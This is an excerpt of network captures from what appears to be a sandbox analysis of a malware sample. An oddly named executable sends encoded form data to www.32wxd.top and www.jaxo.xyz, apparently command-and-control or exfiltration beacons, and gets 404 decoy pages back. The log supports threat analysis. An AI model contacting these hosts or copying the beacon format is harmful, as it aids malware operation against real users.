                                        Data Ascii: r8=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe4V9tl4bWEWKIn2W2CK63ZWZB2ZNEpn4zE=
                                        Sep 3, 2024 13:54:31.966136932 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:31 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.449752206.119.82.116806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:33.857142925 CEST10836OUTPOST /kyiu/ HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.32wxd.top
                                        Referer: http://www.32wxd.top/kyiu/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 45 4e 72 4f 71 33 58 4f 45 4e 34 6e 47 32 49 45 5a 6f 58 78 2b 5a 38 37 6b 71 30 55 46 4c 5a 4a 39 4d 77 74 68 6b 34 4c 6f 76 46 35 61 57 2f 58 4a 72 68 74 6e 69 41 78 73 6a 30 62 49 45 30 52 65 48 32 53 6d 75 43 47 67 6f 55 73 61 7a 48 4e 31 67 68 39 76 78 4e 53 64 74 38 4d 67 2b 76 45 31 5a 4f 31 78 37 38 66 4a 43 5a 78 44 44 57 6f 45 31 44 35 5a 7a 47 78 72 56 4b 6d 44 62 48 73 2f 69 75 54 56 34 44 53 78 6a 66 4e 4d 66 71 38 55 65 55 55 38 42 4c 70 2b 4c 54 44 69 47 73 58 64 44 65 6a 58 56 57 77 56 50 71 31 49 6f 52 4e 64 4c 64 70 67 5a 6c 78 6f 68 2f 62 6f 39 6f 45 68 37 69 6c 34 78 53 63 34 56 42 79 43 73 59 38 59 7a 51 45 77 6b 74 37 33 5a 67 67 74 73 76 50 6f 50 62 2b 42 4c 62 56 57 52 33 4e 36 49 61 56 41 33 6c 67 49 79 4d 77 42 2f 78 67 47 4b 35 57 35 36 65 4a 62 37 43 59 37 76 62 52 6a 6c 63 69 36 4f 2b 75 4b 45 57 61 4e 61 65 4f 44 69 7a 51 62 53 68 44 4f [TRUNCATED]
                                        Data Ascii: r8=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBCENrOq3XOEN4nG2IEZoXx+Z87kq0UFLZJ9Mwthk4LovF5aW/XJrhtniAxsj0bIE0ReH2SmuCGgoUsazHN1gh9vxNSdt8Mg+vE1ZO1x78fJCZxDDWoE1D5ZzGxrVKmDbHs/iuTV4DSxjfNMfq8UeUU8BLp+LTDiGsXdDejXVWwVPq1IoRNdLdpgZlxoh/bo9oEh7il4xSc4VByCsY8YzQEwkt73ZggtsvPoPb+BLbVWR3N6IaVA3lgIyMwB/xgGK5W56eJb7CY7vbRjlci6O+uKEWaNaeODizQbShDOCDubglgRrvSwEstlNwIrNRbC0cLNd64biJcUli/MGMxnB/m/9zvvfCnBt1JCLZLJiBiuUlm0SyeT9g3RzGPP0XlOSewKAyqoAMSgMSTAEGc+e3evdFN3nFzwNhttV21Dw1loHj7Ari1LZL5QUzej9V9tk9rEismE+1CBDKxiOdJWmwEUXqNxwKvoi5OEjTnWNxdIoAceb3d3M5c3Xvgy/4ML26rLCqFYWpVlDYTmDrGP+vzMnv4BtRQ9TWLmXLOFbT52QVbGytoXTpfLSx9aLjAP7eyLgKvQnRpMMaw1VYErUApqFVfyv8MSKD3qGsNEqKaUEJgoVHPoEAvyZKH4kv5ktjBKrBimecJoC4suV1sABxQUOK2zO7Fs1Hj4OaEimmtmY0Nqxk2M6mEfiprsm/NuewmYtxP4wNXqohIX6KFmOweJ5JDii0//l8lf9X7WqkJMkszu0hmHqZx14af7yKS0+I6cj79MBkODD+09mVqfPkClyrztKCILEDfxN7Sk3Z4UIl5PWcP2R922lhgwsrsqMsXmDUGP0sJTkAJdoUu/wBuCGNzRGqV1OZSBonwKVgS1Q3nGN7YxPV6AvI3/G/78oKoOrUuZubSS2gQ6R2428B3PscYugREvV+hugjMeGiZy5a3QxVgNBMyvaY3099OqCrK/eG1h9u [TRUNCATED]
                                        Sep 3, 2024 13:54:34.722579956 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:34 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.449753206.119.82.116806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:36.399796009 CEST479OUTGET /kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:37.271822929 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:37 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.44975466.29.149.180806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:42.408958912 CEST731OUTPOST /f9bc/ HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.jaxo.xyz
                                        Referer: http://www.jaxo.xyz/f9bc/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 51 4b 51 57 34 33 4a 50 6a 74 63 65 6b 54 6c 65 6a 61 56 32 31 61 5a 38 68 46 7a 6f 33 41 73 74 6e 53 76 43 6f 43 32 41 72 79 65 55 45 77 78 70 2f 50 55 75 63 54 45 6c 4e 68 57 62 65 69 77 6c 31 2f 6f 56 79 4c 64 32 4a 35 2b 6e 7a 77 39 36 64 70 50 6e 47 64 76 58 54 36 35 42 51 30 6d 50 50 33 65 38 44 63 79 4b 70 6a 6f 32 44 46 37 79 52 4b 2b 56 48 46 4c 70 41 37 34 61 6d 66 67 59 35 50 34 38 78 42 7a 50 62 63 7a 49 4c 34 58 63 43 7a 74 56 72 46 67 46 64 48 33 57 53 48 46 4c 6d 66 5a 69 65 46 71 6e 59 77 69 67 30 51 58 37 37 69 70 54 7a 77 3d 3d
                                        Data Ascii: r8=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrFgFdH3WSHFLmfZieFqnYwig0QX77ipTzw==
                                        Sep 3, 2024 13:54:43.011328936 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:42 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:43.011353016 CEST224INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                        Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                                        Sep 3, 2024 13:54:43.011368036 CEST1236INData Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                                        Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                                        Sep 3, 2024 13:54:43.011435986 CEST1236INData Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                                        Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                                        Sep 3, 2024 13:54:43.011449099 CEST1236INData Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                                        Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                                        Sep 3, 2024 13:54:43.011461973 CEST672INData Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                                        Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                                        Sep 3, 2024 13:54:43.011506081 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                        Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                        Sep 3, 2024 13:54:43.011518955 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                        Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                        Sep 3, 2024 13:54:43.011532068 CEST448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                        Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                        Sep 3, 2024 13:54:43.011686087 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                        Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                                        Sep 3, 2024 13:54:43.016442060 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                                        Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.44975566.29.149.180806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:44.961085081 CEST751OUTPOST /f9bc/ HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.jaxo.xyz
                                        Referer: http://www.jaxo.xyz/f9bc/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 49 74 69 48 54 43 36 58 57 41 6f 79 65 55 51 41 77 6a 77 76 56 69 63 54 34 63 4e 6b 75 62 65 6a 51 6c 31 37 73 56 7a 38 78 35 4a 70 2b 66 37 51 39 43 54 4a 50 6e 47 64 76 58 54 35 46 72 51 30 65 50 50 44 69 38 41 2b 57 4c 71 6a 6f 31 41 46 37 79 56 4b 2b 5a 48 46 4c 41 41 34 39 33 6d 64 59 59 35 4b 45 38 78 55 47 5a 56 63 7a 4f 50 34 57 76 53 53 63 4e 68 56 52 75 62 6b 71 7a 56 55 68 66 75 35 49 34 50 30 4c 77 4b 77 47 54 70 58 65 50 32 68 55 61 6f 77 47 61 67 75 73 56 4d 74 65 49 51 64 52 49 76 70 6c 77 34 76 67 3d
                                        Data Ascii: r8=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwGTpXeP2hUaowGagusVMteIQdRIvplw4vg=
                                        Sep 3, 2024 13:54:45.545619011 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:45 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
